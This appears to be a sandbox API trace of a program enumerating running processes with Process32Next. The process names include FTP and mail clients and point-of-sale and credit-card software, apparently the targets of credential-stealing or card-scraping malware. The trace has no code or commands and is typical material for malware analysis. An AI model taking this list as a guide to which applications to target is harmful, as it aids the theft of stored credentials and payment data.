[0260.681] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.840] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.842] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0260.843] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0260.845] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.846] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.848] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0260.849] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0260.851] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0260.852] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0260.854] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.858] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0260.860] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.862] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.864] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.866] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0260.868] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0260.873] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0260.874] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0260.876] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0260.878] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0260.880] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0260.882] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0260.884] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0260.938] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0260.940] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0260.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0260.944] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0260.945] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0260.947] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0260.952] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0260.953] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0260.954] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0260.956] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0260.958] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0260.959] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0260.960] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0260.962] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0260.963] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0260.968] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0260.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0260.972] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0260.973] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0260.975] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0260.977] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0261.025] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0261.028] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0261.030] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0261.031] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0261.033] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0261.035] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0261.036] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0261.038] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0261.040] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0261.044] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0261.047] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0261.049] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0261.051] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0261.054] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0261.056] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0261.062] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0261.064] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0261.067] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0261.069] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0261.071] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0261.122] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0261.125] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0261.127] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0261.129] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0261.131] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0261.134] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0261.136] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0261.138] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0261.140] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0261.143] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0261.145] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0261.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0261.149] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0261.151] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0261.154] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0261.156] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.158] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.160] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.162] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0261.164] CloseHandle 